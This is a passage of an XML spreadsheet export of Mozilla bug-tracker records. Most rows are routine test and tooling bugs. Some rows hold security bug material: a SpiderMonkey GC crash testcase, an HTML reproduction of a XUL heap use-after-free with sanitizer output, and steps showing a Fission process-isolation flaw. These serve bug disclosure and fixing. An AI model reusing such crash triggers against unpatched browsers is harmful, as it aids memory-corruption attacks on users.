    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X2303" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2304">
      <c r="A2304" t="n">
        <v>930509</v>
      </c>
      <c r="B2304" t="inlineStr">
        <is>
          <t>2013-10-24 06:29:30 -0700</t>
        </is>
      </c>
      <c r="C2304" t="inlineStr">
        <is>
          <t>Test failure 'Window has been found.' in testCloseDownloadManager.js and testOpenDownloadManager.js</t>
        </is>
      </c>
      <c r="D2304" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E2304" t="n">
        <v>1</v>
      </c>
      <c r="F2304" t="n">
        <v>1</v>
      </c>
      <c r="G2304" t="n">
        <v>6</v>
      </c>
      <c r="H2304" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2304" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J2304" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K2304" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2304" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2304" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2304" t="inlineStr">
        <is>
          <t>[mozmill-test-failure][Blocked by bug 1083655]</t>
        </is>
      </c>
      <c r="Q2304" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2304" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2304" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2304" t="n">
        <v>1</v>
      </c>
      <c r="U2304" t="n">
        <v>0</v>
      </c>
      <c r="V2304" t="n">
        <v>13</v>
      </c>
      <c r="W2304" t="inlineStr">
        <is>
          <t>Module:    testCloseDownloadManager
Test:      /testDownloading/testCloseDownloadManager.js    
Failure:   Window has been found.
Branches:  default
Platforms: All
Seem a genuine regression. Fails on all platforms, all the time.
We should skip it ASAP.</t>
        </is>
      </c>
      <c r="X2304" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2305">
      <c r="A2305" t="n">
        <v>1557928</v>
      </c>
      <c r="B2305" t="inlineStr">
        <is>
          <t>2019-06-08 02:50:56 -0700</t>
        </is>
      </c>
      <c r="C2305" t="inlineStr">
        <is>
          <t>Assertion failure: isGcMarkingTracer || IsBufferGrayRootsTracer(trc) || IsUnmarkGrayTracer(trc) || IsClearEdgesTracer(trc), at js/src/gc/Marking.cpp:244 with Debugger</t>
        </is>
      </c>
      <c r="D2305" t="inlineStr">
        <is>
          <t>2022-01-10 04:57:33 -0800</t>
        </is>
      </c>
      <c r="E2305" t="n">
        <v>1</v>
      </c>
      <c r="F2305" t="n">
        <v>1</v>
      </c>
      <c r="G2305" t="n">
        <v>3</v>
      </c>
      <c r="H2305" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2305" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2305" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2305" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2305" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2305" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2305" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2305" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q2305" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2305" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2305" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T2305" t="n">
        <v>1</v>
      </c>
      <c r="U2305" t="n">
        <v>0</v>
      </c>
      <c r="V2305" t="n">
        <v>17</v>
      </c>
      <c r="W2305" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 155a7e2117e5 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --cpu-count=2 --ion-offthread-compile=off):
    var g = newGlobal({ newCompartment: true });
    var dbg = new Debugger;
    var gw = dbg.addDebuggee(g);
    lfOffThreadGlobal = g;
    lfOffThreadGlobal.offThreadCompileScript(`
      grayRoot()[0] = "foo";
    `);
    lfOffThreadGlobal.runOffThreadScript();
    var g = newGlobal({newCompartment: true});
    var gw = dbg.addDebuggee(g);
    lfOffThreadGlobal = null;
    gc();
    schedulegc(this);
    schedulegc('atoms');
    gc('zone');
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  js::CheckTracedThing&lt;JSString&gt; (trc=trc@entry=0x7fffffffbb38, thing=0x1ca3aeb24a60) at js/src/gc/Marking.cpp:242
    #1  0x00005555560bb3c8 in DoCallback&lt;JSString&gt; (trc=0x7fffffffbb30, thingp=0x1ca3aeb290c0, name=0x555556bad81b "description") at js/src/gc/Tracer.cpp:43
    #2  0x00005555560a47d1 in JS::ApplyGCThingTyped&lt;js::TraceChildren(JSTracer*, void*, JS::TraceKind)::&lt;lambda(auto:12)&gt; &gt; (f=&lt;unknown type&gt;, traceKind=&lt;optimized out&gt;, thing=0x1ca3aeb290c0) at dist/include/js/TraceKind.h:261
    #3  js::TraceChildren (trc=trc@entry=0x7fffffffbb38, thing=thing@entry=0x1ca3aeb290c0, kind=&lt;optimized out&gt;) at js/src/gc/Tracer.cpp:100
    #4  0x0000555556047b6e in UnmarkGrayTracer::onChild (this=0x7fffffffbdb0, thing=...) at js/src/gc/Marking.cpp:3623
    #5  0x0000555555ca4272 in JS::CallbackTracer::onSymbolEdge (this=0x7fffffffbdb0, symp=&lt;optimized out&gt;) at dist/include/js/TracingAPI.h:149
    #6  0x00005555560bb4b9 in JS::CallbackTracer::dispatchToOnEdge (symp=0x7fffffffbc50, this=0x7fffffffbdb0) at dist/include/js/TracingAPI.h:248
    #7  DoCallback&lt;JS::Symbol&gt; (trc=0x7fffffffbdb0, thingp=thingp@entry=0x7fffffffbc50, name=0x555556bbbe25 "propid") at js/src/gc/Tracer.cpp:45
    #8  0x00005555560c0621 in _ZZ10DoCallbackIN2JS11PropertyKeyEET_PNS0_14CallbackTracerEPS2_PKcENKUlS2_E_clIPNS0_6SymbolEEEDaS2_ (t=&lt;optimized out&gt;, __closure=&lt;optimized out&gt;) at js/src/gc/Tracer.cpp:56
    #9  _ZN2js15MapGCThingTypedIZ10DoCallbackIN2JS11PropertyKeyEET_PNS2_14CallbackTracerEPS4_PKcEUlS4_E_EEDaRKS3_OS4_ (f=&lt;optimized out&gt;, iden=...) at dist/include/js/Id.h:227
    #10 DoCallback&lt;JS::PropertyKey&gt; (trc=&lt;optimized out&gt;, thingp=thingp@entry=0x1ca3aebd66d0, name=name@entry=0x555556bbbe25 "propid") at js/src/gc/Tracer.cpp:57
    #11 0x0000555556091494 in js::gc::TraceEdgeInternal&lt;JS::PropertyKey&gt; (trc=&lt;optimized out&gt;, thingp=0x1ca3aebd66d0, name=0x555556bbbe25 "propid") at js/src/gc/Marking.cpp:564
    #12 0x00005555560490a6 in js::TraceEdge&lt;JS::PropertyKey&gt; (name=0x555556bbbe25 "propid", thingp=&lt;optimized out&gt;, trc=0x7fffffffbdb8) at js/src/gc/Tracer.h:124
    #13 js::Shape::traceChildren (this=0x1ca3aebd66c8, trc=0x7fffffffbdb8) at js/src/gc/Marking.cpp:1061
    #14 0x00005555560a472d in JS::ApplyGCThingTyped&lt;js::TraceChildren(JSTracer*, void*, JS::TraceKind)::&lt;lambda(auto:12)&gt; &gt; (f=&lt;unknown type&gt;, traceKind=&lt;optimized out&gt;, thing=&lt;optimized out&gt;) at dist/include/js/TraceKind.h:261
    #15 js::TraceChildren (kind=&lt;optimized out&gt;, thing=&lt;optimized out&gt;, trc=0x7fffffffbdb8) at js/src/gc/Tracer.cpp:100
    #16 JS::TraceChildren (trc=trc@entry=0x7fffffffbdb8, thing=...) at js/src/gc/Tracer.cpp:90
    #17 0x0000555556047dbb in UnmarkGrayTracer::unmark (this=0x7fffffffbdb0, cell=...) at js/src/gc/Marking.cpp:3664
    #18 0x00005555560480c1 in UnmarkGrayGCThing (rt=0x7ffff5f1c000, thing=...) at js/src/gc/Marking.cpp:3699
    #19 0x000055555609092f in ShouldMarkCrossCompartment (dstCell=&lt;optimized out&gt;, src=&lt;optimized out&gt;, marker=0x7ffff5f1d6f8) at js/src/gc/Marking.cpp:332
    #20 ShouldTraceCrossCompartment (dstCell=&lt;optimized out&gt;, src=&lt;optimized out&gt;, trc=0x7ffff5f1d6f8) at js/src/gc/Marking.cpp:363
    #21 js::TraceManuallyBarrieredCrossCompartmentEdge&lt;JSObject*&gt; (trc=0x7ffff5f1d6f8, src=&lt;optimized out&gt;, dst=0x7fffffffbe90, name=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:466
    #22 0x0000555555a3d53d in DebuggerObject_trace (trc=0x7ffff5f1d6f8, obj=0x1ca3aeb84250) at js/src/vm/Debugger.cpp:10281
    #23 0x000055555608f69d in js::Class::doTrace (this=0x555557d1ee60 &lt;js::DebuggerObject::class_&gt;, obj=0x1ca3aeb84250, trc=0x7ffff5f1d6f8) at dist/include/js/Class.h:872
    #24 CallTraceHook&lt;js::GCMarker::processMarkStackTop(js::SliceBudget&amp;)::&lt;lambda(auto:25)&gt; &gt; (check=CheckGeneration::DoChecks, obj=0x1ca3aeb84250, trc=0x7ffff5f1d6f8, f=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:1480
    #25 js::GCMarker::processMarkStackTop (this=this@entry=0x7ffff5f1d6f8, budget=...) at js/src/gc/Marking.cpp:1850
    #26 0x000055555604596f in js::GCMarker::markUntilBudgetExhausted (this=this@entry=0x7ffff5f1d6f8, budget=...) at js/src/gc/Marking.cpp:1636
    #27 0x000055555604638e in js::gc::GCRuntime::markUntilBudgetExhausted (this=this@entry=0x7ffff5f1c6a8, sliceBudget=..., phase=phase@entry=js::gcstats::PhaseKind::MARK) at js/src/gc/GC.cpp:6053
    #28 0x000055555605d50c in js::gc::GCRuntime::incrementalSlice (this=this@entry=0x7ffff5f1c6a8, budget=..., reason=reason@entry=JS::GCReason::API, session=...) at js/src/gc/GC.cpp:7215
    #29 0x000055555605e083 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff5f1c6a8, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::GCReason::API) at js/src/gc/GC.cpp:7628
    #30 0x000055555605e72c in js::gc::GCRuntime::collect (this=this@entry=0x7ffff5f1c6a8, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::GCReason::API) at js/src/gc/GC.cpp:7808
    #31 0x000055555605ec29 in js::gc::GCRuntime::gc (this=0x7ffff5f1c6a8, gckind=GC_NORMAL, reason=reason@entry=JS::GCReason::API) at js/src/gc/GC.cpp:7896
    #32 0x000055555605ee0f in JS::NonIncrementalGC (cx=cx@entry=0x7ffff5f19000, gckind=&lt;optimized out&gt;, reason=reason@entry=JS::GCReason::API) at js/src/gc/GC.cpp:8732
    #33 0x0000555555c6857a in GC (cx=cx@entry=0x7ffff5f19000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/TestingFunctions.cpp:474
    #34 0x000055555591dedf in CallJSNative (cx=0x7ffff5f19000, native=native@entry=0x555555c68460 &lt;GC(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:448
    [...]
    #47 0x000055555585c135 in Shell (envp=&lt;optimized out&gt;, op=0x7fffffffd8f0, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:10787
    #48 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:11406
    rax	0x555557dba000	93825034592256
    rbx	0x1ca3aeb24a60	31489336167008
    rcx	0x7ffff6c1c2dd	140737333281501
    rdx	0x555556ca7640	93825016690240
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffffbaa0	140737488337568
    rsp	0x7fffffffba80	140737488337536
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x58	88
    r11	0x7ffff6b927a0	140737332717472
    r12	0x7fffffffbb38	140737488337720
    r13	0x7ffff5f3d000	140737319784448
    r14	0x2	2
    r15	0x7fffffffbe90	140737488338576
    rip	0x55555606fac5 &lt;js::CheckTracedThing&lt;JSString&gt;(JSTracer*, JSString*)+1397&gt;
    =&gt; 0x55555606fac5 &lt;js::CheckTracedThing&lt;JSString&gt;(JSTracer*, JSString*)+1397&gt;:	movl   $0x0,0x0
       0x55555606fad0 &lt;js::CheckTracedThing&lt;JSString&gt;(JSTracer*, JSString*)+1408&gt;:	ud2</t>
        </is>
      </c>
      <c r="X2305" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2306">
      <c r="A2306" t="n">
        <v>787704</v>
      </c>
      <c r="B2306" t="inlineStr">
        <is>
          <t>2012-09-01 11:59:04 -0700</t>
        </is>
      </c>
      <c r="C2306" t="inlineStr">
        <is>
          <t>use-after-free in nsIContent::GetNameSpaceID</t>
        </is>
      </c>
      <c r="D2306" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:50 -0700</t>
        </is>
      </c>
      <c r="E2306" t="n">
        <v>1</v>
      </c>
      <c r="F2306" t="n">
        <v>1</v>
      </c>
      <c r="G2306" t="n">
        <v>3</v>
      </c>
      <c r="H2306" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2306" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2306" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2306" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2306" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2306" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2306" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2306" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2306" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T2306" t="n">
        <v>1</v>
      </c>
      <c r="U2306" t="n">
        <v>0</v>
      </c>
      <c r="V2306" t="n">
        <v>29</v>
      </c>
      <c r="W2306" t="inlineStr">
        <is>
          <t>Created attachment 657590
repro case
when I load:
&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;
      .c0 { content:'A' } 
    &lt;/style&gt;
    &lt;script&gt;
      onload = function() {
        document.body.appendChild(document.createElement('td'))
        el0=document.createElement('div')
        document.body.appendChild(el0)
        el1=document.createElement('form')
        document.body.appendChild(el1)
        el2=document.createElement('input')
        el2.setAttribute('type', 'submit')
        el1.appendChild(el2)
        el3=document.createElement('input')
        el3.setAttribute('required', 'A')
        el1.appendChild(el3)  
        el4=document.createElement('input')
        el4.type='file'
        el1.appendChild(el4)
        setTimeout(function() {
          el4.focus()
          setTimeout(function() {
            el4.click()
            el2.setAttribute('required', 'A')
            el0.setAttribute('class', 'c0')
            setTimeout(function() {
              document.designMode='on'
              document.execCommand('italic')
              document.designMode='off'
              setTimeout(function() {
                el2.click()
              }, 100)
            }, 100)
          }, 100)
        }, 100)
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
I get a crash like so:
==24180== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffbe11ac98 at pc 0x7fffeeb97d74 bp 0x7ffffffedd70 sp 0x7ffffffedd68
READ of size 8 at 0x7fffbe11ac98 thread T0
    #0 0x7fffeeb97d74 in nsIContent::GetNameSpaceID() const /builds/slave/try-lnx64/build/../../../dist/include/nsINodeInfo.h:143
    #1 0x7fffee6f9a37 in nsCOMPtr&lt;nsIDOMEventTarget&gt;::operator=(nsCOMPtr&lt;nsIDOMEventTarget&gt; const&amp;) /builds/slave/try-lnx64/build/../../../../dist/include/nsCOMPtr.h:614
    #2 0x7fffee6fe5fb in nsXULPopupManager::ShowPopupCallback(nsIContent*, nsMenuPopupFrame*, bool, bool) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:716
    #3 0x7fffee6fc7a2 in nsXULPopupManager::FirePopupShowingEvent(nsIContent*, bool, bool) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:1181
    #4 0x7fffee6fcf36 in nsXULPopupManager::ShowPopup(nsIContent*, nsIContent*, nsAString_internal const&amp;, int, int, bool, bool, bool, nsIDOMEvent*) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:568
    #5 0x7fffee691040 in non-virtual thunk to nsPopupBoxObject::OpenPopup(nsIDOMElement*, nsAString_internal const&amp;, int, int, bool, bool, nsIDOMEvent*) /builds/slave/try-lnx64/build/../../../../dist/include/nsCOMPtr.h:407
0x7fffbe11ac98 is located 24 bytes inside of 368-byte region [0x7fffbe11ac80,0x7fffbe11adf0)
freed by thread T0 here:
    #0 0x42ae21 in free ??:0
    #1 0x7fffee92a335 in nsNodeUtils::LastRelease(nsINode*) /builds/slave/try-lnx64/build/content/base/src/nsNodeUtils.cpp:261
    #2 0x7fffee9ff963 in mozilla::dom::FragmentOrElement::Release() /builds/slave/try-lnx64/build/content/base/src/FragmentOrElement.cpp:1853
    #3 0x7fffef02ebc4 in nsGlobalWindow::SetFocusedNode(nsIContent*, unsigned int, bool) /builds/slave/try-lnx64/build/dom/base/nsGlobalWindow.cpp:7765
    #4 0x7fffeefc93be in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) 
aurora and nightly affected atleast.</t>
        </is>
      </c>
      <c r="X2306" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2307">
      <c r="A2307" t="n">
        <v>1412793</v>
      </c>
      <c r="B2307" t="inlineStr">
        <is>
          <t>2017-10-30 03:33:18 -0700</t>
        </is>
      </c>
      <c r="C2307" t="inlineStr">
        <is>
          <t>Update flake8 from 3.4.1 to 3.5 and pyflakes from 1.5.0 to 1.6.0</t>
        </is>
      </c>
      <c r="D2307" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E2307" t="n">
        <v>1</v>
      </c>
      <c r="F2307" t="n">
        <v>1</v>
      </c>
      <c r="G2307" t="n">
        <v>7</v>
      </c>
      <c r="H2307" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2307" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2307" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2307" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2307" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2307" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2307" t="inlineStr">
        <is>
          <t>[lang=py]</t>
        </is>
      </c>
      <c r="Q2307" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2307" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2307" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2307" t="n">
        <v>1</v>
      </c>
      <c r="U2307" t="n">
        <v>0</v>
      </c>
      <c r="V2307" t="n">
        <v>4</v>
      </c>
      <c r="W2307" t="inlineStr">
        <is>
          <t>pyup-bot opened this PR to update flake8:
https://github.com/mozilla/treeherder/pull/2865
However flake8 3.5.0 adds some new checks, which are causing Travis to fail. These will need fixing before flake8 can be updated.
See:
http://flake8.pycqa.org/en/latest/release-notes/3.5.0.html
https://travis-ci.org/mozilla/treeherder/jobs/291585634#L579</t>
        </is>
      </c>
      <c r="X2307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2308">
      <c r="A2308" t="n">
        <v>80468</v>
      </c>
      <c r="B2308" t="inlineStr">
        <is>
          <t>2001-05-12 09:12:38 -0700</t>
        </is>
      </c>
      <c r="C2308" t="inlineStr">
        <is>
          <t>Lock icon never locks</t>
        </is>
      </c>
      <c r="D2308" t="inlineStr">
        <is>
          <t>2001-05-22 08:07:04 -0700</t>
        </is>
      </c>
      <c r="E2308" t="n">
        <v>1</v>
      </c>
      <c r="F2308" t="n">
        <v>1</v>
      </c>
      <c r="G2308" t="n">
        <v>3</v>
      </c>
      <c r="H2308" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2308" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2308" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2308" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2308" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2308" t="inlineStr"/>
      <c r="Q2308" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2308" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2308" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T2308" t="n">
        <v>1</v>
      </c>
      <c r="U2308" t="n">
        <v>0</v>
      </c>
      <c r="V2308" t="n">
        <v>14</v>
      </c>
      <c r="W2308" t="inlineStr">
        <is>
          <t>Build: 05-11-06
OS: WinME
The lock icon does not lock when visiting SSL web sites.</t>
        </is>
      </c>
      <c r="X2308" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2309">
      <c r="A2309" t="n">
        <v>95759</v>
      </c>
      <c r="B2309" t="inlineStr">
        <is>
          <t>2001-08-17 04:40:41 -0700</t>
        </is>
      </c>
      <c r="C2309" t="inlineStr">
        <is>
          <t>localconfig.js contains strings of equals signs (===)</t>
        </is>
      </c>
      <c r="D2309" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E2309" t="n">
        <v>1</v>
      </c>
      <c r="F2309" t="n">
        <v>1</v>
      </c>
      <c r="G2309" t="n">
        <v>4</v>
      </c>
      <c r="H2309" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2309" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2309" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2309" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L2309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2309" t="inlineStr"/>
      <c r="Q2309" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2309" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2309" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2309" t="n">
        <v>1</v>
      </c>
      <c r="U2309" t="n">
        <v>0</v>
      </c>
      <c r="V2309" t="n">
        <v>10</v>
      </c>
      <c r="W2309" t="inlineStr">
        <is>
          <t>localconfig.js contains strings of equals signs (===), which can be
misinterpreted as indicators of a conflict in the file when using grep to find
files with conflicts in them.  Recommendation: use a different character to
underline section headers.</t>
        </is>
      </c>
      <c r="X2309" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2310">
      <c r="A2310" t="n">
        <v>753623</v>
      </c>
      <c r="B2310" t="inlineStr">
        <is>
          <t>2012-05-09 18:56:35 -0700</t>
        </is>
      </c>
      <c r="C2310" t="inlineStr">
        <is>
          <t>Graphite 2 crash [@graphite2::Pass::readPass]</t>
        </is>
      </c>
      <c r="D2310" t="inlineStr">
        <is>
          <t>2012-10-25 17:57:14 -0700</t>
        </is>
      </c>
      <c r="E2310" t="n">
        <v>1</v>
      </c>
      <c r="F2310" t="n">
        <v>1</v>
      </c>
      <c r="G2310" t="n">
        <v>3</v>
      </c>
      <c r="H2310" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2310" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2310" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2310" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2310" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2310" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2310" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2310" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2310" t="inlineStr">
        <is>
          <t>[asan][sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2310" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2310" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2310" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T2310" t="n">
        <v>1</v>
      </c>
      <c r="U2310" t="n">
        <v>0</v>
      </c>
      <c r="V2310" t="n">
        <v>16</v>
      </c>
      <c r="W2310" t="inlineStr">
        <is>
          <t>Created attachment 622603
testcase</t>
        </is>
      </c>
      <c r="X2310" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2311">
      <c r="A2311" t="n">
        <v>1811999</v>
      </c>
      <c r="B2311" t="inlineStr">
        <is>
          <t>2023-01-24 00:07:11 -0800</t>
        </is>
      </c>
      <c r="C2311" t="inlineStr">
        <is>
          <t>Server-side redirects to data: URL inherits process of redirector in Fission</t>
        </is>
      </c>
      <c r="D2311" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:31 -0700</t>
        </is>
      </c>
      <c r="E2311" t="n">
        <v>1</v>
      </c>
      <c r="F2311" t="n">
        <v>1</v>
      </c>
      <c r="G2311" t="n">
        <v>3</v>
      </c>
      <c r="H2311" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2311" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2311" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K2311" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2311" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2311" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2311" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2311" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main114+]</t>
        </is>
      </c>
      <c r="Q2311" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2311" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2311" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T2311" t="n">
        <v>0</v>
      </c>
      <c r="U2311" t="n">
        <v>0</v>
      </c>
      <c r="V2311" t="n">
        <v>8</v>
      </c>
      <c r="W2311" t="inlineStr">
        <is>
          <t>Created attachment 9313727
frame_data.html
Open redirect in a website are considered as not a vulnerability in many sites (e.g. https://bughunters.google.com/learn/invalid-reports/web-platform/navigation/6680364896223232/open-redirectors).
This is especially true for server-side redirect because a server-side redirect to Javascript URLs are blocked in all browsers (therefore, not threat for XSS).
However, Firefox inherits process from a redirect initiator when a server-side redirect happens to data: URLs. Therefore, sites which intentionally allows server-side open redirect are vulnerable to Spectre or other inprocess attacks.
Please note that server-side redirect to data: URLs are only supported in Firefox (among major browsers), so this threat only applies to Firefox.
Steps:
1. Open attached file.
2. Open about:processes
3. Observe that the data: URL iframe lives in the same process as vuln.shhnjk.com</t>
        </is>
